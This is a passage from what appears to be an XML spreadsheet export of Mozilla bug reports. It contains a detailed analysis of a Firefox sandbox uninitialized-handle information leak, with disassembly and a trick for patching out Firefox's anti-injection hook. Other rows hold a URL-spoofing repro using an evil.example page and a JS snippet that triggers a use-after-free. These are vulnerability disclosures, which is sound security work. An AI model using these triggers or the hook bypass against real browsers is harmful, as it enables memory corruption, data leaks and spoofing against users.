So basically, instead of leaking a string size, we leak a function pointer that corresponds to the return address pushed on the stack while executing the `_memmove` called by `GetParameterStr`.
This demonstrates that this bug does leak some sensitive information from the broker and that it is possible to get different kind of data by playing with the crosscall parameters.
## Testing it
### DLL injection
To play with the sandbox without using a renderer RCE bug, a simple way to do that is using reflective DLL injection. However, Firefox prevents that by hooking the function `kernel32!BaseThreadInitThunk`
```
0:028&gt; u KERNEL32!BaseThreadInitThunk
KERNEL32!BaseThreadInitThunk:
763e8460 e99bc87bde      jmp     mozglue!patched_BaseThreadInitThunk (54ba4d00)
763e8465 51              push    ecx
```
Therefore, simply patch the `JMP` by the standard `MOV EDI, EDI`.
```
KERNEL32!BaseThreadInitThunk:
763e8460 8bff            mov     edi,edi
763e8462 55              push    ebp
```
## Looking at the disassembly
```asm
.text:00416A00                 mov     [ebp+__io_information], 0
.text:00416A07                 lea     edx, [ebp+phandle]
.text:00416A0A                 push    eax             ; unsigned int *
.text:00416A0B                 push    ecx             ; int *
.text:00416A0C                 push    edx             ; void **
.text:00416A0D                 push    [ebp+arg_14]    ; unsigned int
.text:00416A10                 push    [ebp+arg_10]    ; unsigned int
.text:00416A13                 push    [ebp+arg_C]     ; unsigned int
.text:00416A16                 push    [ebp+arg_8]     ; unsigned int
.text:00416A19                 push    [ebp+arg_4]     ; std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt; &gt; *
.text:00416A1C                 push    dword ptr [edi] ; sandbox::ClientInfo *
.text:00416A1E                 push    esi             ; sandbox::EvalResult
.text:00416A1F                 call    sandbox::FileSystemPolicy::OpenFileAction(sandbox::EvalResult,sandbox::ClientInfo const &amp;,std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt; const &amp;,uint,uint,uint,uint,void * *,long *,ulong *)
.text:00416A24                 add     esp, 28h
.text:00416A27                 mov     ecx, [ebp+arg_0]
.text:00416A2A                 test    al, al
.text:00416A2C                 jz      short loc_416A3D
.text:00416A2E                 mov     eax, [ebp+__io_information]
.text:00416A31                 mov     [ecx+1Ch], eax
.text:00416A34                 mov     ebx, [ebp+nt_status]
.text:00416A37                 mov     eax, [ebp+phandle]
.text:00416A3A                 mov     [ecx+18h], eax
```
```asm
public: static bool __cdecl sandbox::FileSystemPolicy::OpenFileAction(enum  sandbox::EvalResult, struct sandbox::ClientInfo const &amp;, class std::basic_string&lt;wchar_t, struct std::char_traits&lt;wchar_t&gt;, class std::allocator&lt;wchar_t&gt;&gt; const &amp;, unsigned int, unsigned int, unsigned int, unsigned int, void * *, long *, unsigned long *) proc near
.text:00418A20                                         ; CODE XREF: sandbox::FilesystemDispatcher::NtOpenFile(sandbox::IPCInfo *,std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt; *,uint,uint,uint,uint)+11F↑p
.text:00418A20
.text:00418A20 var_4C          = dword ptr -4Ch
.text:00418A20 var_48          = dword ptr -48h
.text:00418A20 var_44          = dword ptr -44h
.text:00418A20 var_3C          = _OBJECT_ATTRIBUTES ptr -3Ch
.text:00418A20 var_24          = _UNICODE_STRING ptr -24h
.text:00418A20 var_1C          = dword ptr -1Ch
.text:00418A20 var_18          = dword ptr -18h
.text:00418A20 var_14          = dword ptr -14h
.text:00418A20 arg_0           = dword ptr  8
.text:00418A20 arg_4           = dword ptr  0Ch
.text:00418A20 arg_8           = dword ptr  10h
.text:00418A20 arg_C           = dword ptr  14h
.text:00418A20 arg_10          = dword ptr  18h
.text:00418A20 arg_14          = dword ptr  1Ch
.text:00418A20 arg_18          = dword ptr  20h
.text:00418A20 arg_1C          = dword ptr  24h
.text:00418A20 arg_20          = dword ptr  28h
.text:00418A20 arg_24          = dword ptr  2Ch
.text:00418A20
.text:00418A20                 push    ebp
.text:00418A21                 mov     ebp, esp
.text:00418A23                 push    ebx
.text:00418A24                 push    edi
.text:00418A25                 push    esi
.text:00418A26
.text:00418A26 eval_result:
.text:00418A26                 and     esp, 0FFFFFFF0h
.text:00418A29                 sub     esp, 40h
.text:00418A2C                 mov     ecx, ___security_cookie
.text:00418A32                 mov     eax, [ebp+arg_0]
.text:00418A35                 mov     edx, [ebp+arg_20]
.text:00418A38                 xor     ecx, ebp
.text:00418A3A                 cmp     eax, 3 // compare DENY_ACCESS to EVAL_BROKER
.text:00418A3D                 mov     [esp+4Ch+var_14], ecx
.text:00418A41                 jnz     loc_418AFF
[...]
.text:00418AFF loc_418AFF:                             ; CODE XREF: sandbox::FileSystemPolicy::OpenFileAction(sandbox::EvalResult,sandbox::ClientInfo const &amp;,std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt; const &amp;,uint,uint,uint,uint,void * *,long *,ulong *)+21↑j
.text:00418AFF                 mov     dword ptr [edx], 0C0000022h
.text:00418B05
.text:00418B05 loc_418B05:                             ; CODE XREF: sandbox::FileSystemPolicy::OpenFileAction(sandbox::EvalResult,sandbox::ClientInfo const &amp;,std::basic_string&lt;wchar_t,std::char_traits&lt;wchar_t&gt;,std::allocator&lt;wchar_t&gt;&gt; const &amp;,uint,uint,uint,uint,void * *,long *,ulong *)+DD↑j
.text:00418B05                 mov     ecx, [esp+4Ch+var_14]
.text:00418B09                 xor     ecx, ebp        ; cookie
.text:00418B0B                 call    __security_check_cookie(x)
.text:00418B10                 mov     al, 1
.text:00418B12                 lea     esp, [ebp-0Ch]
.text:00418B15                 pop     esi
.text:00418B16                 pop     edi
.text:00418B17                 pop     ebx
.text:00418B18                 pop     ebp
.text:00418B19                 retn
```
```c++
enum EvalResult {
  // Comparison opcode values:
  EVAL_TRUE,   // Opcode condition evaluated true.
  EVAL_FALSE,  // Opcode condition evaluated false.
  EVAL_ERROR,  // Opcode condition generated an error while evaluating.
  // Action opcode values:
  ASK_BROKER,  // The target must generate an IPC to the broker. On the broker
               // side, this means grant access to the resource.
  DENY_ACCESS,   // No access granted to the resource.
  GIVE_READONLY,  // Give readonly access to the resource.
  GIVE_ALLACCESS,  // Give full access to the resource.
  GIVE_CACHED,  // IPC is not required. Target can return a cached handle.
  GIVE_FIRST,  // TODO(cpu)
  SIGNAL_ALARM,  // Unusual activity. Generate an alarm.
  FAKE_SUCCESS,  // Do not call original function. Just return 'success'.
  FAKE_ACCESS_DENIED,  // Do not call original function. Just return 'denied'
                       // and do not do IPC.
  TERMINATE_PROCESS,  // Destroy target process. Do IPC as well.
};
```
If the file we're trying to open gets an DENY_ACCESS `EvalResult` instead of `ASK_BROKER`, the bug will be triggered.
The disassembly shows that the handle does stay uninitialized.
## Bug variants
#### NtOpenKey unitialized handle leak
The `NtOpenKey` dispatcher (broker side) contains the exact same bug and will also write an uninitialized `HANDLE` in the shared memory.  Me might be able to leak different kind of information using this bug because the handle variable would be allocated at a different place on the stack.
```c++
bool RegistryDispatcher::NtOpenKey(IPCInfo* ipc,
                                   base::string16* name,
                                   uint32_t attributes,
                                   HANDLE root,
                                   uint32_t desired_access) {
// [...]
  HANDLE handle; // not initialized
  NTSTATUS nt_status;
  if (!RegistryPolicy::OpenKeyAction(result, *ipc-&gt;client_info, *name,
                                     attributes, root, desired_access, &amp;handle,
                                     &amp;nt_status)) {
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
  // Return operation status on the IPC.
  ipc-&gt;return_info.nt_status = nt_status;
  ipc-&gt;return_info.handle = handle; // may be uninitialized
  return true;
}
```
```c++
bool RegistryPolicy::OpenKeyAction(EvalResult eval_result,
                                   const ClientInfo&amp; client_info,
                                   const base::string16&amp; key,
                                   uint32_t attributes,
                                   HANDLE root_directory,
                                   uint32_t desired_access,
                                   HANDLE* handle,
                                   NTSTATUS* nt_status) {
  // The only action supported is ASK_BROKER which means open the requested
  // file as specified.
  if (ASK_BROKER != eval_result) {
    *nt_status = STATUS_ACCESS_DENIED;
    return true; // should be balse, handle is not written
  }
// [...]
  return true;
}
```
#### Misc
An incorrect behaviour can also be observed in the following functions:
- NtQueryAttributesFile
- NtQueryFullAttributesFile
- NtSetInformationFile
However, they don't lead to any information disclosure as the don't write anything interesting back to the shared memory.
For instance, even though `QueryAttributesFileAction` could incorrectly return the value `true`, it would only lead to execute `ipc-&gt;return_info.nt_status = nt_status` instead of `ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED`. 
```c++
  if (!FileSystemPolicy::QueryAttributesFileAction(result, *ipc-&gt;client_info,
                                                   *name, attributes,
                                                   information, &amp;nt_status)) {
    ipc-&gt;return_info.nt_status = STATUS_ACCESS_DENIED;
    return true;
  }
  // Return operation status on the IPC.
  ipc-&gt;return_info.nt_status = nt_status;
  return true;
```
## Code history
When working on this bug, as firefox initially forked the chromium sandbox, we might wonder if this bug also affects chromium. It does not. 
Indeed, chromium actually changed the code back in September 2017.
The current filesystem policy code in chromium looks like the following : 
```c++
bool FileSystemPolicy::OpenFileAction([...]) {
  *handle = nullptr;
// [...]
  if (ASK_BROKER != eval_result) {
    *nt_status = STATUS_ACCESS_DENIED;
    return false;
  }
// [...]
  *nt_status = NtCreateFileInTarget(
      handle, desired_access, &amp;obj_attributes, &amp;io_block, 0, share_access,
      FILE_OPEN, open_options, nullptr, 0, client_info.process);
// [...]
  return true;
}
```
First, we can observe that the return value is correct.</t>
        </is>
      </c>
      <c r="X5200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5201">
      <c r="A5201" t="n">
        <v>1399269</v>
      </c>
      <c r="B5201" t="inlineStr">
        <is>
          <t>2017-09-12 15:12:53 -0700</t>
        </is>
      </c>
      <c r="C5201" t="inlineStr">
        <is>
          <t>Remove AppState from the app.</t>
        </is>
      </c>
      <c r="D5201" t="inlineStr">
        <is>
          <t>2017-09-13 17:17:06 -0700</t>
        </is>
      </c>
      <c r="E5201" t="n">
        <v>1</v>
      </c>
      <c r="F5201" t="n">
        <v>1</v>
      </c>
      <c r="G5201" t="n">
        <v>2</v>
      </c>
      <c r="H5201" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5201" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5201" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K5201" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5201" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5201" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5201" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5201" t="inlineStr">
        <is>
          <t>[Photon][MobileCore]</t>
        </is>
      </c>
      <c r="Q5201" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5201" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5201" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5201" t="n">
        <v>1</v>
      </c>
      <c r="U5201" t="n">
        <v>0</v>
      </c>
      <c r="V5201" t="n">
        <v>5</v>
      </c>
      <c r="W5201" t="inlineStr">
        <is>
          <t>The AppState object was a concept used to keep the old Menu in sync. We've removed the old menu and no longer need the AppState to help keep the menu in sync. 
The new menu no longer has as much state as the old one. Actions that are relevant to the page only show up in a separate menu.
Because of this lets get rid of the appstate concept completely.</t>
        </is>
      </c>
      <c r="X5201" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5202">
      <c r="A5202" t="n">
        <v>650732</v>
      </c>
      <c r="B5202" t="inlineStr">
        <is>
          <t>2011-04-17 23:10:20 -0700</t>
        </is>
      </c>
      <c r="C5202" t="inlineStr">
        <is>
          <t>Crash [@ nsSMILInstanceTime::HandleChangedInterval(nsSMILTimeContainer const*, int, int) ] [@ nsSMILInstanceTime::HandleChangedInterval ]</t>
        </is>
      </c>
      <c r="D5202" t="inlineStr">
        <is>
          <t>2011-08-24 04:41:02 -0700</t>
        </is>
      </c>
      <c r="E5202" t="n">
        <v>1</v>
      </c>
      <c r="F5202" t="n">
        <v>1</v>
      </c>
      <c r="G5202" t="n">
        <v>3</v>
      </c>
      <c r="H5202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5202" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5202" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5202" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5202" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5202" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5202" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5202" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T5202" t="n">
        <v>1</v>
      </c>
      <c r="U5202" t="n">
        <v>0</v>
      </c>
      <c r="V5202" t="n">
        <v>52</v>
      </c>
      <c r="W5202" t="inlineStr">
        <is>
          <t>Mardeg reported this crash in IRC: bp-78a2bf1e-bcc7-4b02-a751-555a32110417
He doesn't have STR, but he says he'd just closed a tab with animated SVG before crashing.
Looking at the stack trace, it's cycle-collection triggering nsSMILTimedElement::Unlink, which eventually triggers nsSMILInstanceTime::HandleChangedInterval, which hits this line:
&gt;141   PRBool objectChanged = mCreator-&gt;DependsOnBegin() ? aBeginObjectChanged :
&gt;142                                                       aEndObjectChanged;
...and crashes on a null-deref, since mCreator is apparently null.</t>
        </is>
      </c>
      <c r="X5202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5203">
      <c r="A5203" t="n">
        <v>1622278</v>
      </c>
      <c r="B5203" t="inlineStr">
        <is>
          <t>2020-03-13 07:27:34 -0700</t>
        </is>
      </c>
      <c r="C5203" t="inlineStr">
        <is>
          <t>Firefox for Android custom tabs URL spoofing</t>
        </is>
      </c>
      <c r="D5203" t="inlineStr">
        <is>
          <t>2024-05-30 10:12:37 -0700</t>
        </is>
      </c>
      <c r="E5203" t="n">
        <v>1</v>
      </c>
      <c r="F5203" t="n">
        <v>1</v>
      </c>
      <c r="G5203" t="n">
        <v>6</v>
      </c>
      <c r="H5203" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5203" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5203" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5203" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5203" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5203" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5203" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-esr68.7+]</t>
        </is>
      </c>
      <c r="Q5203" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5203" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5203" t="n">
        <v>1</v>
      </c>
      <c r="U5203" t="n">
        <v>0</v>
      </c>
      <c r="V5203" t="n">
        <v>15</v>
      </c>
      <c r="W5203" t="inlineStr">
        <is>
          <t>Created attachment 9133193
spoof.html
Custom tabs in Firefox for Android fail to update the URL correctly, allowing malicious websites to spoof other origins.
Steps to reproduce:
1. Host the attached file (spoof.html) at the following URL: http://evil.example/spoof.html
2. Open the following URL in Firefox for Android: intent://evil.example/spoof.html#Intent;package=org.mozilla.firefox;action=android.intent.action.VIEW;scheme=http;S.android.support.customtabs.extra.SESSION=;end;
3. Observe how a custom tab opens, the URL changes to "https://google.com/", yet content is displayed from the "evil.example" host</t>
        </is>
      </c>
      <c r="X5203" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5204">
      <c r="A5204" t="n">
        <v>1330029</v>
      </c>
      <c r="B5204" t="inlineStr">
        <is>
          <t>2017-01-10 09:18:31 -0800</t>
        </is>
      </c>
      <c r="C5204" t="inlineStr">
        <is>
          <t>Localized screenshot of Settings screen for App Store</t>
        </is>
      </c>
      <c r="D5204" t="inlineStr">
        <is>
          <t>2017-01-30 09:48:51 -0800</t>
        </is>
      </c>
      <c r="E5204" t="n">
        <v>1</v>
      </c>
      <c r="F5204" t="n">
        <v>1</v>
      </c>
      <c r="G5204" t="n">
        <v>2</v>
      </c>
      <c r="H5204" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5204" t="inlineStr">
        <is>
          <t>Focus-iOS</t>
        </is>
      </c>
      <c r="J5204" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5204" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="L5204" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5204" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5204" t="inlineStr"/>
      <c r="Q5204" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5204" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5204" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5204" t="n">
        <v>1</v>
      </c>
      <c r="U5204" t="n">
        <v>0</v>
      </c>
      <c r="V5204" t="n">
        <v>2</v>
      </c>
      <c r="W5204" t="inlineStr">
        <is>
          <t>We need a new screenshot for the settings screen for the App Store content. We will probably do these manually.</t>
        </is>
      </c>
      <c r="X5204" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5205">
      <c r="A5205" t="n">
        <v>1288555</v>
      </c>
      <c r="B5205" t="inlineStr">
        <is>
          <t>2016-07-21 15:23:41 -0700</t>
        </is>
      </c>
      <c r="C5205" t="inlineStr">
        <is>
          <t>wrong compartment while structured cloning a cross-compartment ArrayBuffer</t>
        </is>
      </c>
      <c r="D5205" t="inlineStr">
        <is>
          <t>2017-02-09 07:56:06 -0800</t>
        </is>
      </c>
      <c r="E5205" t="n">
        <v>1</v>
      </c>
      <c r="F5205" t="n">
        <v>1</v>
      </c>
      <c r="G5205" t="n">
        <v>3</v>
      </c>
      <c r="H5205" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5205" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5205" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5205" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5205" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5205" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5205" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q5205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5205" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5205" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T5205" t="n">
        <v>1</v>
      </c>
      <c r="U5205" t="n">
        <v>0</v>
      </c>
      <c r="V5205" t="n">
        <v>14</v>
      </c>
      <c r="W5205" t="inlineStr">
        <is>
          <t>When transferring the contents of an ArrayBuffer during a structured clone, a cross-compartment ArrayBuffer is unwrapped, but then the detach call happens in the original compartment. If there is more than one view on that ArrayBuffer, all views after the second will then fail to be detached (because we have an InnerViewsTable *on the compartment* that holds all views but the first.)
As a result, these views (eg typed arrays) will still have pointers into the ArrayBuffer's data, which is a huge correctness violation as well as a set up for lots of race conditions if the data has been transferred between threads. Furthermore, if the buffer gets GC'd, it's a very controllable UAF.
JS shell example:
b = new ArrayBuffer(100);
ta = new Int32Array(b);
ta[0] = 17;
g = newGlobal();
g.b = b;
ta2 = g.eval("new Int32Array(b)");
g.serialize(b, [b]);
// gc();
print(ta[0]);
print(ta2[0]); // This is 17, should be undefined. With the gc(), it is a UAF and will probably crash.
In the browser, you'd use postMessage to detach the buffer.</t>
        </is>
      </c>
      <c r="X5205" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5206">
      <c r="A5206" t="n">
        <v>303433</v>
      </c>
      <c r="B5206" t="inlineStr">
        <is>
          <t>2005-08-04 11:12:45 -0700</t>
        </is>
      </c>
      <c r="C5206" t="inlineStr">
        <is>
          <t>CVE-2005-4720 Firefox 1.0.6 segfaults on this malformed .html page</t>
        </is>
      </c>
      <c r="D5206" t="inlineStr">
        <is>
          <t>2006-02-28 09:04:35 -0800</t>
        </is>
      </c>
      <c r="E5206" t="n">
        <v>1</v>
      </c>
      <c r="F5206" t="n">
        <v>1</v>
      </c>
      <c r="G5206" t="n">
        <v>3</v>
      </c>
      <c r="H5206" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5206" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5206" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5206" t="inlineStr">
        <is>
          <t>1.7 Branch</t>
        </is>
      </c>
      <c r="L5206" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5206" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5206" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5206" t="inlineStr"/>
      <c r="Q5206" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5206" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5206" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5206" t="n">
        <v>1</v>
      </c>
      <c r="U5206" t="n">
        <v>0</v>
      </c>
      <c r="V5206" t="n">
        <v>59</v>
      </c>
      <c r="W5206" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6
When browsing to a malformed .html page, Firefox will segfault.
Reproducible: Always
Steps to Reproduce:
1.Browse to malformed page.
2.
3.
Actual Results:  
program sefaults, creating a core file.
Expected Results:  
parsed the page properly.
not sure.</t>
        </is>
      </c>
      <c r="X5206" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5207">
      <c r="A5207" t="n">
        <v>499862</v>
      </c>
      <c r="B5207" t="inlineStr">
        <is>
          <t>2009-06-22 18:58:33 -0700</t>
        </is>
      </c>
      <c r="C5207" t="inlineStr">
        <is>
          <t>"ASSERTION: invalid array index" with overflow:scroll, float:left, text-transform, changing &lt;style&gt;</t>
        </is>
      </c>
      <c r="D5207" t="inlineStr">
        <is>
          <t>2010-07-15 13:55:30 -0700</t>
        </is>
      </c>
      <c r="E5207" t="n">
        <v>1</v>
      </c>
      <c r="F5207" t="n">
        <v>1</v>
      </c>
      <c r="G5207" t="n">
        <v>3</v>
      </c>
      <c r="H5207" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5207" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5207" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5207" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5207" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5207" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5207" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5207" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5207" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5207" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5207" t="n">
        <v>1</v>
      </c>
      <c r="U5207" t="n">
        <v>0</v>
      </c>
      <c r="V5207" t="n">
        <v>11</v>
      </c>
      <c r="W5207" t="inlineStr">
        <is>
          <t>Created attachment 384546
testcase
###!!! ASSERTION: Should have been cleared: 'mBreakSinks.IsEmpty()', file layout/generic/nsTextFrameThebes.cpp, line 648
###!!! ASSERTION: Should have Reset() before destruction!: 'mCurrentWord.Length() == 0', file content/base/src/nsLineBreaker.cpp, line 51
###!!! ASSERTION: invalid array index: 'i &lt; Length()', file nsTArray.h, line 317
###!!! ASSERTION: Hmm, something went wrong, aOffset should have been found: 'mGlyphRuns[start].mCharacterOffset &lt;= aOffset', file gfx/thebes/src/gfxFont.cpp, line 2189
Security-sensitive because the "invalid array index" assertion is in an unchecked array access function.</t>
        </is>
      </c>
      <c r="X5207" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5208">
      <c r="A5208" t="n">
        <v>809718</v>
      </c>
      <c r="B5208" t="inlineStr">
        <is>
          <t>2012-11-07 17:57:27 -0800</t>
        </is>
      </c>
      <c r="C5208" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.14 Beta 4</t>
        </is>
      </c>
      <c r="D5208" t="inlineStr">
        <is>
          <t>2012-11-13 00:24:56 -0800</t>
        </is>
      </c>
      <c r="E5208" t="n">
        <v>1</v>
      </c>
      <c r="F5208" t="n">
        <v>1</v>
      </c>
      <c r="G5208" t="n">
        <v>2</v>
      </c>
      <c r="H5208" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5208" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5208" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5208" t="inlineStr">
        <is>
          <t>SeaMonkey 2.14 Branch</t>
        </is>
      </c>
      <c r="L5208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5208" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5208" t="inlineStr"/>
      <c r="Q5208" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5208" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5208" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5208" t="n">
        <v>1</v>
      </c>
      <c r="U5208" t="n">
        <v>0</v>
      </c>
      <c r="V5208" t="n">
        <v>5</v>
      </c>
      <c r="W5208" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.14 Beta 4
We expect an actual release on Friday 9th  November.</t>
        </is>
      </c>
      <c r="X5208" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5209">
      <c r="A5209" t="n">
        <v>1372509</v>
      </c>
      <c r="B5209" t="inlineStr">
        <is>
          <t>2017-06-13 01:55:26 -0700</t>
        </is>
      </c>
      <c r="C5209" t="inlineStr">
        <is>
          <t>Self-XSS XUL Injection in about:webrtc</t>
        </is>
      </c>
      <c r="D5209" t="inlineStr">
        <is>
          <t>2021-10-21 12:16:16 -0700</t>
        </is>
      </c>
      <c r="E5209" t="n">
        <v>1</v>
      </c>
      <c r="F5209" t="n">
        <v>1</v>
      </c>
      <c r="G5209" t="n">
        <v>3</v>
      </c>
      <c r="H5209" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5209" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5209" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K5209" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5209" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5209" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5209" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5209" t="inlineStr">
        <is>
